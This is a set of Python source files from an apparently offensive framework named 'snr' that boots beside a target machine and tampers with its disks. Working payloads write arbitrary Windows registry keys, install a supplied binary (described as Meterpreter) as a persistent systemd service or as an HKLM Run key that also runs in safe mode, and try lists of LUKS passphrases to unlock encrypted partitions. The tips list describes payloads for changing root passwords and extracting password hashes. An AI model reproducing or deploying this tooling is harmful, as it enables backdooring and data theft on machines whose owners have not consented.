#!/usr/bin/python3
"""
Registry payload
"""
from snr.core.payload import entry_point, nt_registry, storage
from snr.core.util import common_utils

REGISTRIES = "@REGISTRIES@"
PASSPHRASES = "@PASSPHRASES@"


@entry_point.entry_point
def main(block_info: storage.BlocksType, *_) -> None:
    for part in storage.query_all_partitions(block_info):
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            if mounted_part.is_windows():
                with nt_registry.NtRegistry(mounted_part) as reg:
                    for raw_key in REGISTRIES:
                        name, key, type_ = raw_key.split(":", maxsplit=2)
                        node = reg.find_node(name)
                        if node is None:
                            # Create it
                            hive_path = "\\".join(name.split("\\")[:2])
                            parent_node = reg.find_node(hive_path)
                            assert parent_node is not None
                            for node_path in name.split("\\")[2:]:
                                new_node = parent_node.find_child(node_path)
                                if new_node is None:
                                    new_node = parent_node.new_child(node_path)
                                parent_node = new_node
                            # Now parent_node is our node
                            node = parent_node
                        node.new_data(key, getattr(
                            nt_registry, type_), REGISTRIES[raw_key])
            else:
                common_utils.print_warning("Unknown operating system!")

if __name__ == "__main__":
    main()



"""
Payload class base
"""

import ipaddress
import os.path
import re
import shutil
import socket
from typing import Any, Mapping, Optional

from snr.cli import variables
# This is an exception to the general rule, it is best for payloads to
# get their Context class from payload, so they can use that name for `snr.core.payload.context`
from snr.core.core.context import Context
from snr.core.core.variable_manager import (NORMAL, REQUIRED, USED_BY_PAYLOAD,
                                            VALID_ALPHA, VALID_ALPHANUM,
                                            VALID_ASCII, VALID_HOST_PATH,
                                            VALID_IP, VALID_IPV4, VALID_IPV6,
                                            VALID_LOCAL_PATH,
                                            VALID_PATH_COMPONENT, VALID_PORT,
                                            VALID_STRING, VariableFlags,
                                            VariableType)
from snr.core.util import at_formatter, common_utils, network_interfaces
from snr.core.util.payloads import autorun

__all__ = (
    "Payload", "Context",
    "NORMAL", "REQUIRED",
    "USED_BY_PAYLOAD", "VALID_STRING",
    "VALID_ALPHA", "VALID_ALPHANUM",
    "VALID_ASCII", "VALID_PATH_COMPONENT",
    "VALID_LOCAL_PATH", "VALID_HOST_PATH",
    "VALID_PORT", "VALID_IP",
    "VALID_IPV4", "VALID_IPV6"
)

_invalid_path_chars = re.compile(r'[\\/:*?"<>|/]')


class Payload:
    """Base payload class. Contains utilities for payload generation as well.

    Attributes:

        AUTHORS:
            Tuple of authors. In format "Pseudonym (Real name) <Email>".
            In place of pseudonym, real name can be used and all parts but the name is optional

        LICENSE:
            License SPDX identifier, not specifying one means using
            the project's license (GPLv3)

        INPUTS:
            A tuple of input variables. More specifically, it's a tuple of tuples,
            each tuple is for one variable. Order is, variable name,
            default value, size, documentation An example would be:
            (
                ("foo", "bar", 3, "Foo or bar"),
                ("spam", [], 12, "12 Spams")
            )

        DEPENDENCIES: Deb packages as dependencies for the payload to work

        ROOTFS_VERSION: Ask for a specific rootfs version, if snr is running 
                        an earlier version, it will patch it's rootfs up
    """
    AUTHORS: tuple[Optional[str], ...] = ()
    LICENSE: str = "gpl-3.0"
    INPUTS: tuple[tuple[str, VariableType, int, str] |
                  tuple[str, VariableType, int, str, bool] |
                  tuple[str, VariableType, int, str, VariableFlags], ...] = ()
    DEPENDENCIES: tuple[str, ...] = ()
    TARGET_OS_LIST: tuple[str, ...] = ()
    ROOTFS_VERSION: int

    _autorun: autorun.Autorun | None = None
    _validated_vars: dict[str, VariableType]

    @staticmethod
    def _validate_str_var(name: str, value: str, flags: VariableFlags, ctx: Context) -> str:
        for flag in flags:
            match flag:
                case VariableFlags.VALID_STRING:
                    if len(value.strip()) == 0 or "\x00" in value:
                        raise common_utils.UserError(
                            f"{name} may not be empty or contain null bytes")
                case VariableFlags.VALID_STR_ALPHA:
                    if not value.isalpha():
                        raise common_utils.UserError(
                            f"{name} must be alphabetic")
                case VariableFlags.VALID_STR_ALPHANUM:
                    if not value.isalnum():
                        raise common_utils.UserError(
                            f"{name} must be alphabetic-numeric")
                case VariableFlags.VALID_STR_ASCII:
                    if not value.isascii():
                        raise common_utils.UserError(
                            f"{name} must be ASCII")
                case VariableFlags.VALID_STR_PATH_COMPONENT:
                    if _invalid_path_chars.search(value):
                        raise common_utils.UserError(
                            f"{name} must be a valid path component")
                case VariableFlags.VALID_STR_LOCAL_PATH:
                    if not os.path.exists(value):
                        raise common_utils.UserError(
                            f"{name} does not exist on the local machine")
                case VariableFlags.VALID_STR_HOST_PATH:
                    if not ctx.exists(value):
                        raise common_utils.UserError(
                            f"{name} does not exist on the host machine")
                case VariableFlags.VALID_PORT:
                    common_utils.print_warning(
                        "This is a warning for developers, VALID_PORT cannot be used with strings,"
                        "for a port use an integer variable instead")
                case VariableFlags.VALID_IP | VariableFlags.VALID_IPV4:
                    try:
                        ipaddress.ip_address(value)
                    except ValueError:
                        common_utils.print_debug(
                            f"{name} does not seem to be an IP address, we will try to resolve it")
                        try:
                            new_value = socket.gethostbyname(value)
                        except socket.gaierror:
                            # Last resort, see if it's a valid network interface
                            net_if = network_interfaces.get_network_interface(
                                value)
                            if net_if is None:
                                raise common_utils.UserError(
                                    f"{name} is not a valid IP address, neither a valid "
                                    "hostname nor a valid interface") from None
                            if flag & VariableFlags.VALID_IP:
                                tmp = net_if.ipv4_address if net_if.ipv4_address is not None else net_if.ipv6_address
                                if tmp is None:
                                    # No IP capability at all
                                    raise common_utils.UserError(
                                        f"Network interface {name} does not have IP capabilities") from None
                                new_value = tmp
                            else:
                                if net_if.ipv4_address is None:
                                    raise common_utils.UserError(
                                        f"Network interface {name} does not have IPv4 capabilities") from None
                                new_value = net_if.ipv4_address
                        value = new_value
                case VariableFlags.VALID_IPV6:
                    try:
                        ipaddress.ip_address(value)
                    except ValueError:
                        common_utils.print_debug(
                            f"{name} does not seem to be an IPv6 address, we will try to resolve it")
                        try:
                            new_value = socket.getaddrinfo(
                                value, None, socket.AF_INET6)[0][4][0]
                        except (socket.gaierror, IndexError):
                            net_if = network_interfaces.get_network_interface(
                                value)
                            if net_if is None:
                                raise common_utils.UserError(
                                    f"{name} is not a valid IPv6 address, neither a valid hostname "
                                    "nor a valid interface") from None
                            if net_if.ipv6_address is None:
                                raise common_utils.UserError(
                                    f"Network interface {name} does not have IPv6 capabilities") from None
                            new_value = net_if.ipv6_address
                        value = new_value
        return value

    @staticmethod
    def _validate_int_var(name: str, value: int, flags: VariableFlags, _: Context) -> int:
        for flag in flags:
            match flag:
                case VariableFlags.VALID_PORT:
                    if value not in range(0, 65535):
                        raise common_utils.UserError(
                            f"{name} is not a valid port number"
                        )
        return value

    def load(self) -> int:
        """Payload load hook

        Returns:
            status code (0 for success, anything else for failure)
        """
        for inp in self.INPUTS:
            if len(inp) == 4:
                variables.global_vars.set_variable(
                    inp[0], inp[1], inp[2], inp[3], USED_BY_PAYLOAD)
            elif len(inp) == 5:
                flags = inp[4]
                if isinstance(flags, bool):
                    flags = VariableFlags(flags)
                variables.global_vars.set_variable(
                    inp[0], inp[1], inp[2], inp[3], USED_BY_PAYLOAD | flags)
            else:
                raise common_utils.UserError(
                    f"'{inp}' is not a valid input variable")
        return 0

    def unload(self) -> int:
        """Payload unload hook

        Returns:
            status code (0 for success, anything else for failure)
        """
        for inp in self.INPUTS:
            variables.global_vars.del_variable(inp[0])
        return 0

    def validate(self, ctx: Context) -> dict[str, VariableType]:
        """Validate variables

        Raises:
            common_utils.UserError: One of the condition of variables failed

        Returns:
            All related variables
        """
        result = {}
        for inp in self.INPUTS:
            value = variables.global_vars.get_variable(inp[0])
            result[inp[0]] = value
            var_info = variables.global_vars.get_variable_info(inp[0])
            if var_info.flags & REQUIRED and result[inp[0]] == var_info.default_value:
                raise common_utils.UserError(
                    f"{inp[0]} is required but is not set")
            if var_info.var_type == str:
                result[inp[0]] = self._validate_str_var(
                    inp[0], value, var_info.flags, ctx)
            elif var_info.var_type == int:
                result[inp[0]] = self._validate_int_var(
                    inp[0], value, var_info.flags, ctx)
            elif var_info.var_type == list:
                new_value = []
                for index, element in enumerate(value):
                    new_value.append(self._validate_str_var(
                        inp[0] + f"[{index}]", element, var_info.flags, ctx))
                result[inp[0]] = new_value
        self._validated_vars = result
        return result

    def generate(self, ctx: Context) -> int:
        """Payload generate method

        Args:
            ctx: Payload generation context

        Returns:
            status code (0 for success, anything else for failure)
        """
        raise NotImplementedError

    @staticmethod
    def supports_encrypted_access() -> tuple[str, list[str], int, str]:
        """Declare that the payload supports decrypting partitions

        It does so with declaring a PASSPHRASES string list variable
        you could use with many utilities of snr to access encrypted partitions

        Returns:
            The variable definitions you need to add
        """
        return ("PASSPHRASES", [], -1, "Passphrases to try for encrypted partitions")

    def copy_root_to_root(self, ctx: Context, module_path: str,
                          src: str, dest: str,
                          follow_symlinks: bool = True) -> str:
        """Copy a file from payload's package root to host filesystem's root

        Args:
            ctx: Payload generation context
            module_path: Path to the payload's __init__.py module
            src: copy operation source
            dest: copy operation destination
            follow_symlinks Follow symlinks instead of recreating them. Defaults to True

        Returns:
            Destination path
        """
        return shutil.copyfile(os.path.join(os.path.dirname(module_path), src),
                               ctx.join(dest),
                               follow_symlinks=follow_symlinks)

    def format_payload_and_write(self, ctx: Context, data: Mapping[str, Any],
                                 local_payload_path: str = "payload.py",
                                 host_payload_path: str = "root/payload.py") -> None:
        """Format a payload using AtFormatter and write it to the host filesystem

        Args:
            ctx: Payload generation context
            data: Variable, Value dictionary
            local_payload_path: Local path to payload
            host_payload_path: Path inside the host filesystem to write the result to
        """
        with open(local_payload_path, encoding="utf-8") as stream:
            payload_data = stream.read()
        with ctx.open(host_payload_path, "w") as stream:
            stream.write(at_formatter.AtFormatter(
                data).format_str(payload_data))

    def get_self_variables(self) -> dict[str, VariableType]:
        """Obtain all variables related to this payload.
        Variables related to this payload are discovered using the payload's INPUTS

        Returns:
            All variables related to this payload
        """
        return self._validated_vars

    def add_autorun(self, ctx: Context, executable: str = "root/payload.py") -> None:
        """Add an autorun service for executable.
        In case of several calls, order will be preserved

        Args:
            ctx: Payload generation context
            executable: Executable to add service for (it must exist on host filesystem)
        """
        if self._autorun is None:
            self._autorun = autorun.Autorun(ctx)
        self._autorun.add_executable(executable)
        self._autorun.write()



"""
Utilities to deal with Network Interfaces
"""

import socket

import psutil
import psutil._common


class NetworkInterface:  # pylint: disable=too-many-instance-attributes,too-few-public-methods
    """A network interface

    Attributes:
        name: Name of the interface
        ipv4_address: IPv4 address of the interface, if IPv4-enabled
        ipv4_broadcast: IPv4 broadcast address of the interface, if IPv4-enabled
        ipv4_netmask: IPv4 network mask of the interface, if IPv4-enabled
        ipv6_address: IPv6 address of the interface, if IPv6-enabled
        ipv6_broadcast: IPv6 broadcast address of the interface, if IPv6-enabled
        ipv6_netmask: IPv6 network mask of the interface, if IPv6-enabled
        mac_address: MAC address of the interface, if a physical network interface
        is_up: Whatever the interface is up or not
        mtu: MTU of the interface
        flags: Flags of the interface (e.g up, broadcast, etc)
    """
    name: str
    ipv4_address: str | None = None
    ipv4_broadcast: str | None = None
    ipv4_netmask: str | None = None
    ipv6_address: str | None = None
    ipv6_broadcast: str | None = None
    ipv6_netmask: str | None = None
    mac_address: str | None = None
    is_up: bool = False
    mtu: int = 0
    flags: tuple[str, ...] = ()

    def __init__(self, name: str, addr_list: list[psutil._common.snicaddr], stat: psutil._common.snicstats):
        self.name = name
        for addr in addr_list:
            match addr.family:
                case socket.AddressFamily.AF_INET:
                    self.ipv4_address = addr.address
                    self.ipv4_broadcast = addr.broadcast
                    self.ipv4_netmask = addr.netmask
                case socket.AddressFamily.AF_INET6:
                    self.ipv6_address = addr.address
                    self.ipv6_broadcast = addr.broadcast
                    self.ipv6_netmask = addr.netmask
                case socket.AddressFamily.AF_PACKET:
                    self.mac_address = addr.address
        self.is_up = stat.isup
        self.mtu = stat.mtu
        self.flags = stat.flags.split(",")


def list_network_interfaces() -> list[NetworkInterface]:
    """Return a list of all network interfaces installed on the machine

    Returns:
        List of all network interfaces installed on the machine
    """
    addrs = psutil.net_if_addrs()
    stats = psutil.net_if_stats()
    ifs = []
    for if_name in addrs:
        ifs.append(NetworkInterface(if_name, addrs[if_name], stats[if_name]))
    return ifs


def get_network_interface(if_name: str) -> NetworkInterface | None:
    """Get a network interface by it's name

    Args:
        if_name: Name of the interface

    Returns:
        Network interface if found, otherwise None 
    """
    addrs = psutil.net_if_addrs()
    stats = psutil.net_if_stats()
    if if_name in addrs and if_name in stats:
        return NetworkInterface(if_name, addrs[if_name], stats[if_name])
    return None



"""
List of tips for users
"""

import random

__all__ = [
    "TIPS", "random_tip"
]

# pylint: disable=line-too-long

TIPS = [
    r"You can set output of a command to a variable using set: set !<var_name> <command>",
    r"If a variable has type of IP, IPv4 or IPv6 Address. You can pass a domain name or an interface name, for example: set LHOST tun0",
    r"You cannot delete variables defined by payloads, instead using set <var_name> or unset <var_name> will reset it to it's default value",
    r"You can define value of a variable from a file using: set !<var_name> read <file_name>",
    r"Search for payloads using list: list infection",
    r"Use misc/multi payload to bundle several payloads into one, it is powerful",
    r"Write use with no argument to unload the current payload",
    r"You can use ${<var_name>} to expand a variable as well, for example: set <var_name> ${var_name}.php",
    r"You can append data before and after strings: set <var_name> prefix${var_name}suffix. Example: set my_var ${my_var}/32",
    r"Toggle Option variables using: set <var_name> !",
    r"Just like strings, you can extend lists as well: set <var_name> data1;data2;${<var_name>};data9",
    r"Help command can be used for more than help on commands, you can get help on defined variables as well",
    r"Payloads are categorized by their usage: access, extraction, infection, misc, tampering",
    r"Access type payloads create access: Like changing admin or root password for you or opening up a ssh server",
    r"Extraction type payloads extract data: Like copying files or account password hashes",
    r"Infection type payloads infect target OS with payloads: Like installing a persistant meterpreter for you"
    r"Tampering type payloads tamper with data on disk: Like changing passwords or swapping files"
    r"Misc type payloads are the powerful misfits of Snr which offer unique payloads: Like misc/multi which allows bundling several payloads"
]


def random_tip() -> str:
    """Return a random tip

    Returns:
        Random tip from TIPS
    """
    return random.choice(TIPS)



#!/usr/bin/python3
"""
Custom payload
"""
from snr.core.payload import context, entry_point, storage, nt_registry
from snr.core.util import common_utils
from snr.core.util.payloads import systemd_service

LINUX_SERVICE_NAME = "@LINUX_SERVICE_NAME@"
LINUX_SERVICE_DESCRIPTION = "@LINUX_SERVICE_DESCRIPTION@"
WINDOWS_SERVICE_NAME = "@WINDOWS_SERVICE_NAME@"
PASSPHRASES = "@PASSPHRASES@"


@entry_point.entry_point
def main(block_info: storage.BlocksType, *_) -> None:
    for part in storage.query_all_partitions(block_info):
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            ctx = context.require_context_for_mount_point(
                mounted_part.mount_point)
            # Try to see if we are dealing with any sort of Linux
            if mounted_part.is_linux():
                mounted_part.mkdir(f"usr/lib/libexec/{LINUX_SERVICE_NAME}/")
                mounted_part.copy(
                    "/root/data/linux", f"usr/lib/libexec/{LINUX_SERVICE_NAME}/{LINUX_SERVICE_NAME}")
                with mounted_part.open(f"usr/lib/libexec/{LINUX_SERVICE_NAME}/control", "w",
                                       encoding="utf-8") as stream:
                    stream.write("#!/bin/bash\n")
                    stream.write("echo Action failed\n")
                    stream.write("exit 12\n")
                service = systemd_service.SystemdService(
                    ctx, LINUX_SERVICE_NAME)
                service.Unit_section["Description"] = LINUX_SERVICE_DESCRIPTION
                service.Unit_section["After"] = "network-online.target"
                service.Service_section[
                    "ExecStart"] = f"/usr/lib/libexec/{LINUX_SERVICE_NAME}/{LINUX_SERVICE_NAME}"
                service.Service_section["Type"] = "simple"
                service.Service_section[
                    "ExecRestart"] = f"usr/lib/libexec/{LINUX_SERVICE_NAME}/control restart"
                service.Service_section["ExecStop"] = f"usr/lib/libexec/{LINUX_SERVICE_NAME}/control stop"
                service.Install_section["WantedBy"] = "multi-user.target"
                service.write(False, False)
                mounted_part.link(f"/usr/lib/systemd/system/{LINUX_SERVICE_NAME}.service",
                                  f"/usr/lib/systemd/system/multi-user.target.wants/{LINUX_SERVICE_NAME}.service")
            elif mounted_part.is_windows():
                # Determine executable name
                exe_name = WINDOWS_SERVICE_NAME.title().replace(
                    " ", "").replace("-", "").replace("_", "")
                # Copy the executable
                mounted_part.copy("/root/data/windows",
                                  f"Windows/System32/{exe_name}.exe")
                # Persistance using a HKLM Run key
                registry = nt_registry.NtRegistry(mounted_part)
                run_node = registry.find_node(
                    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")
                if run_node is None:
                    # Probably up until CurrentVersion exists, fix it up
                    current_version_node = registry.find_node(
                        "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion")
                    if current_version_node is None:
                        # We have zero idea what is going on
                        common_utils.print_error(
                            "Windows registry seems to be corrupted")
                        continue
                    run_node = current_version_node.new_child("Run")
                # The asterisk ensures it runs even in safe mode
                run_node.new_data("*" + exe_name, nt_registry.REG_SZ,
                                  f"Windows/System32/{exe_name}.exe")
            else:
                common_utils.print_warning("Unknown operating system!")

if __name__ == "__main__":
    main()



"""
Infect with Meterpreter. Note that it uses Metasploit itself.
"""
import os

from snr.core.payload.payload import (REQUIRED, VALID_LOCAL_PATH,
                                      VALID_PATH_COMPONENT, VALID_STRING,
                                      Context, Payload)


class CustomPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("GNU/Linux", "Microsoft Windows")
    INPUTS = (
        ("LINUX_PAYLOAD", "", -1, "Payload to use for Linux", REQUIRED | VALID_LOCAL_PATH),
        ("LINUX_SERVICE_NAME", "", -1,
         "Name of the persistance service for Linux", REQUIRED | VALID_PATH_COMPONENT),
        ("LINUX_SERVICE_DESCRIPTION", "", -1,
         "Description of the persistance service for Linux", REQUIRED | VALID_STRING),
        ("WINDOWS_PAYLOAD", "", -1, "Payload ot use for Windows", REQUIRED | VALID_LOCAL_PATH),
        ("WINDOWS_SERVICE_NAME", "", -1,
         "Name of the persistance service for Windows", REQUIRED | VALID_PATH_COMPONENT),
        Payload.supports_encrypted_access()
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        assert isinstance(variables["WINDOWS_PAYLOAD"], str)
        assert isinstance(variables["LINUX_PAYLOAD"], str)
        for payload_name, platform in ((variables["WINDOWS_PAYLOAD"], "windows"), (variables["LINUX_PAYLOAD"], "linux")):
            ctx.mkdir("root/data")
            if not os.path.isabs(payload_name):
                payload_name = os.path.abspath(payload_name)
            ctx.copy(payload_name, f"data/{platform}")
        self.format_payload_and_write(ctx, variables)
        self.add_autorun(ctx)
        return 0


payload = CustomPayload()



"""
Entry point that handles snr core initialization, data_dir, storage setup, debug mode and safety pin
"""

import inspect
from typing import Callable

from snr.core.payload import context, data_dir, safety_pin, storage
from snr.core.util import common_utils

__all__ = (
    "entry_point",
)

EntryPointType = Callable[[
    list[storage.BlockInfo], context.Context, str], None] | Callable[[], None]


def entry_point(func: EntryPointType | None = None,
                no_lvm: bool = False):
    """Payload entry point decorator

    Args:
        func: Payload entry point
        no_lvm: Do not discover LVM partitions
    """

    def execute_payload(func: EntryPointType) -> None:
        """Execute the payload function with necessary setup."""
        safety_pin.require_lack_of_safety_pin()
        data_dir.fix_data_dir()
        try:
            payload_name = getattr(
                inspect.getmodule(func), "__doc__", "Payload") or "Payload"
            payload_name.strip()
            common_utils.print_debug(f"{payload_name} started")
            if len(inspect.signature(func).parameters) > 0:
                block_info, root_ctx, our_device = storage.setup(no_lvm=no_lvm)
                func(block_info, root_ctx, our_device)
            else:
                func()
            common_utils.print_ok(f"{payload_name} completed")
        except Exception as exc:  # pylint: disable=broad-exception-caught
            common_utils.handle_exception()

    if func is not None:
        return lambda: execute_payload(func)
    return lambda f: lambda: execute_payload(f)



"""
Utility functions to help with the storage.
Allows working with LVM and getting information on all and any disk or partition
"""
import contextlib
import copy
import enum
import json
import os
import tempfile
import time
from typing import Any, Iterable, Literal

from snr.core.core import path_wrapper
from snr.core.payload import context
from snr.core.util import common_utils, programs

__all__ = (
    "BlockInfoTypesType", "BlockInfo",
    "query_all_block_info", "query_all_partitions",
    "query_partition_info_by_path", "query_partition_info_by_uuid",
    "query_partition_info_by_name", "lvm_scan_all",
    "lvm_activate_all_vgs", "luks_is_partition_encrypted",
    "luks_open", "luks_close",
    "get_partition_root", "require_root_device",
    "setup", "handle_luks_partition",
    "MountedPartition", "mount_partition"
)

_root_context: context.Context = None
_root_device: str = ""

###############################################################################
# Block and partition support
###############################################################################

BlockInfoTypesType = Literal['part'] | Literal['crypt'] | Literal['loop'] | Literal['disk'] | Literal['rom']
BlocksType = list['BlockInfo']


class BlockInfo:
    """Info about a block device

    Attributes:
        name: Name of the block ("sda", "sda3", "nvme0np1", "loop1", etc)
        uuid: UUID of the block, can be None (loops, and disks don't have UUID)
        type: Either part, crypt, loop, disk or rom
        size: Size of the partition in bytes
        path: Absolute path to the block
        children: The children of the said block
          For a disk, the children are it's partitions
          For a loop, if mounted, the children are it's partitions
          For a partition, if it is an encrypted partition, it has a child (once it gets unlocked)
          A crypt does not have children
          Note that those above are normal cases,
          for example, a crypt technically can have children, if you encrypt a 
          partition twice for example
    """
    name: str
    uuid: str | None
    type: BlockInfoTypesType
    size: int
    path: str
    children: tuple['BlockInfo', ...]

    def __init__(self,
                 name: str, uuid: str | None,
                 type_: BlockInfoTypesType, size: int,
                 path: str, children: tuple[dict, ...] = ()):
        self.name = name
        self.uuid = uuid
        self.type = type_
        self.size = size
        self.path = path
        self.children = [BlockInfo(child['name'], child.get('uuid', None), child['type'], child['size'], child['path'], child.get(
            'children', ())) for child in children] if len(children) > 0 else ()

    def is_partition(self) -> bool:
        """Is the block a partition

        Returns:
            Whatever the block is a partition or not
        """
        return self.type == "part"

    def is_disk(self) -> bool:
        """Is the block a disk

        Returns:
            Whatever the block is a disk or not
        """
        return self.type == "disk"

    def is_crypt(self) -> bool:
        """Is the block an encrypted partition
        Note that the physical encrypted partition is a normal partition
        but the block that is created when the said partition is decrypted
        that block is crypt. The right way to determine if a partition is encrypted
        is to use luks_is_partition_encrypted

        Returns:
            Whatever the block is an encrypted partition or not
        """
        return self.type == "crypt"

    def is_loop(self) -> bool:
        """Is the block a loop

        Returns:
            Whatever the block is a loop or not
        """
        return self.type == "loop"

    def is_rom(self) -> bool:
        """Is the block a rom

        Returns:
            Whatever the block is a rom or not
        """
        return self.type == "rom"

    def __eq__(self, other: object) -> bool:
        if not isinstance(other, (BlockInfo, str)):
            raise NotImplementedError

        if isinstance(other, str):
            if other.startswith("/"):
                # Compare the paths
                return self.path == other
            # Compare by uuid
            return self.uuid == other
        return self.path == other.path


def query_all_block_info() -> list[BlockInfo]:
    """Query block information for all block devices.
    Returns:
        A list of block devices
    """
    lsblk = programs.Lsblk(stdout=programs.PIPE)
    lsblk.invoke_and_wait(None,  options={
                          "J": None, "M": None, "b": None, "o": "NAME,UUID,TYPE,SIZE,PATH"})
    assert lsblk.stdout is not None
    block_devices_raw = json.load(lsblk.stdout)
    block_devices = []
    for block_device_raw in block_devices_raw["blockdevices"]:
        block_device = BlockInfo(block_device_raw["name"],
                                 block_device_raw["uuid"],
                                 block_device_raw["type"],
                                 block_device_raw["size"],
                                 block_device_raw["path"],
                                 tuple(block_device_raw["children"]))
        block_devices.append(block_device)
    return block_devices


def query_all_partitions(block_info: list[BlockInfo] | None = None, exclude_us: bool = True) -> list[str]:
    """Query all partitions in block_info

    Args:
        block_info: list of block info queried. Optional
        exclude_us: Whatever our own device's partitions should be excluded. Defaults to True.

    Returns:
        list of partition paths
    """
    if block_info is None:
        block_info = query_all_block_info()
    partitions = []
    for block in block_info:
        if exclude_us and block.path == _root_device:
            continue
        for child in block.children:
            if child.is_partition():
                partitions.append(child.path)
    return partitions


def query_partition_info_by_path(path: str,
                                 block_info: list[BlockInfo] | None = None) -> BlockInfo | None:
    """Query block info for a partition.

    Args:
        path: Path to the partition.
        block_info: list of block info queried. Optional

    Returns:
        Block information or None if not found
    """
    if block_info is None:
        block_info = query_all_block_info()
    for block in block_info:
        for child in block.children:
            if child.is_partition() and child == path:
                return copy.deepcopy(child)
    return None


def query_partition_info_by_uuid(uuid: str,
                                 block_info: list[BlockInfo] | None = None) -> BlockInfo | None:
    """Query block info for partition with uuid

    Args:
        uuid: uuid of partition to query
        block_info: list of block info queried. Optional

    Returns:
        Block information or None if not found
    """
    if block_info is None:
        block_info = query_all_block_info()
    for block in block_info:
        for child in block.children:
            if child.is_partition() and child == uuid:
                return copy.deepcopy(child)
    return None


def query_partition_info_by_name(name: str,
                                 block_info: list[BlockInfo] | None = None) -> BlockInfo | None:
    """Query block info for partition with given name

    Args:
        name: Name of partition to query
        block_info: list of block info queried. Optional
    Returns:
        Block information or None if not found
    """
    if block_info is None:
        block_info = query_all_block_info()
    for block in block_info:
        for child in block.children:
            if child.is_partition() and child.name == name:
                return copy.deepcopy(child)
    return None

###############################################################################
# LVM support
###############################################################################


def lvm_scan_all() -> None:
    """Scans disks for LVM LVs
    """
    programs.Vgscan().invoke_and_wait(None, options={
        "q": None, "y": None})
    programs.Lvscan().invoke_and_wait(None, options={
        "q": None, "y": None})


def lvm_activate_all_vgs() -> None:
    """Activate all VGs
    """
    programs.Pvchange().invoke_and_wait(None, options={
        "q": None, "y": None, "a": "y"})

###############################################################################
# LUKS support
###############################################################################


def luks_is_partition_encrypted(path: str) -> bool:
    """Check if a partition is LUKS-encrypted

    Args:
        path: Path to partition to check

    Returns:
        Whatever the partition is LUKS-encrypted or not
    """
    errorcode = programs.Cryptsetup().invoke_and_wait(None, "isLuks", path)
    return not bool(errorcode)


def luks_open(path: str, name: str, passphrase: str) -> bool:
    """Open a LUKS-encrypted partition

    Args:
        path: Path to partition.
        name: Name of the produced device mapping.
        passphrase: passphrase to use for opening

    Returns:
        Whatever the operation was successful or not
    """
    cryptsetup = programs.Cryptsetup(
        stdout=programs.PIPE,
        stdin=programs.PIPE)
    cryptsetup.invoke("luksOpen", path, name)
    assert cryptsetup.stdin is not None
    cryptsetup.stdin.write(passphrase + "\n")
    cryptsetup.stdin.close()
    errorcode = cryptsetup.wait(None)
    return bool(errorcode)


def luks_close(name: str) -> bool:
    """Close a LUKS-encrypted partition

    Args:
        name: name of the mapped device

    Returns:
        Whatever the operation was successful or not
    """
    errorcode = programs.Cryptsetup().invoke_and_wait(None, "luksClose", name)
    return bool(errorcode)


###############################################################################
# Misc
###############################################################################


def get_partition_root(partition: str,
                       block_info: list[BlockInfo] | None = None) -> str | None:
    """Get the root block of a partition

    Args:
        partition: partition to look for.
        block_info: list of block info queried. Optional

    Returns:
        Path to the parent block or None if not found
    """
    if block_info is None:
        block_info = query_all_block_info()
    for block in block_info:
        if partition.startswith(block.path):
            return block.path
    # We cannot continue
    return None


def require_root_device(partition: str,
                        block_info: list[BlockInfo] | None = None) -> str:
    """Require root device of a partition

    Args:
        partition: Path to partition
        block_info: list of block info queried. Optional

    Raises:
        SystemExit: Finding the root device of the partition failed

    Returns:
        Root device of the partition
    """
    root_device = get_partition_root(partition, block_info)
    if root_device is None:
        raise SystemExit(1)
    return root_device


def setup(no_lvm: bool = False) -> tuple[list[BlockInfo], context.Context, str]:
    """Quick setup for storage.

    Handles LVM and returns all the block information

    Args:
        no_lvm: Don't discover LVM partitions

    Returns:
        a tuple of all block information, context for /, and the device the root partition resides on
    """
    global _root_context  # pylint: disable=global-statement
    global _root_device  # pylint: disable=global-statement
    if not no_lvm:
        lvm_scan_all()
        lvm_activate_all_vgs()
    block_info = query_all_block_info()
    _root_context = context.require_context_for_mount_point("/")
    _root_device = require_root_device("/")
    return block_info, _root_context, _root_device


def handle_luks_partition(part: str, passphrases: Iterable[str] = ()) -> tuple[str, str] | tuple[None, None]:
    """Handle a luks partition.

    First try all available passphrases, if none worked, try to get it interactively from the user.

    Args:
        part: Path to partition to mount
            passphrases: Passphrases to try if encountered an encrypted partition. Empty by default

    Returns:
        A tuple of where the partition is mounted and it's name.
        For example, for `/dev/sda3` it would be `("/dev/mapper/sda3_crypt", "sda3_crypt")`
        If failed, return a tuple of None (`(None, None)`)
    """
    luks_name = part.split(os.path.sep)[-1] + "_crypt"
    common_utils.print_info(
        "Luks encrypted partition found! Trying available passphrases...")
    for passphrase in passphrases:
        if luks_open(part, luks_name, passphrase):
            common_utils.print_info("Luks partition opened!")
            return luks_name, f"/dev/mapper/{luks_name}"
    try:
        common_utils.print_warning(
            "Passphrase not found! Press Ctrl + C to try a passphrase")
        time.sleep(5)
        return None, None
    except KeyboardInterrupt:
        try:
            while True:
                common_utils.print_info(
                    "Enter new passphrase or press Ctrl + C again to abort: ", end="")
                passphrase = input()
                if luks_open(part, luks_name, passphrase):
                    common_utils.print_info(
                        "Luks partition opened!")
                    break
        except KeyboardInterrupt:
            common_utils.print_warning(
                f"No passphrase found for partition '{part}'")
            return None, None
    part = f"/dev/mapper/{luks_name}"
    return luks_name, part


class MountedPartition(contextlib.AbstractContextManager['MountedPartition'],
                       path_wrapper.PathWrapperBase, path_var_name="mount_point"):
    """A mounted partition

    Attributes:
        mount_point: Where the partition is mounted
    """
    _part: str
    _passphrases: Iterable[str]
    _no_luks: bool
    _is_luks_encrypted: bool
    _luks_name: str
    _flags: 'PartitionType | None' = None
    mount_point: str

    class PartitionType(enum.Flag):
        """Partition types"""
        EFI_PARTITION = enum.auto()
        BOOT_PARTITION = enum.auto()
        SYSTEM_PARTITION = enum.auto()
        DATA_PARTITION = enum.auto()
        LINUX_PARTITION = enum.auto()
        WINDOWS_PARTITION = enum.auto()

    EFI_PARTITION = PartitionType.EFI_PARTITION
    BOOT_PARTITION = PartitionType.BOOT_PARTITION
    SYSTEM_PARTITION = PartitionType.SYSTEM_PARTITION
    DATA_PARTITION = PartitionType.DATA_PARTITION
    LINUX_PARTITION = PartitionType.LINUX_PARTITION
    WINDOWS_PARTITION = PartitionType.WINDOWS_PARTITION

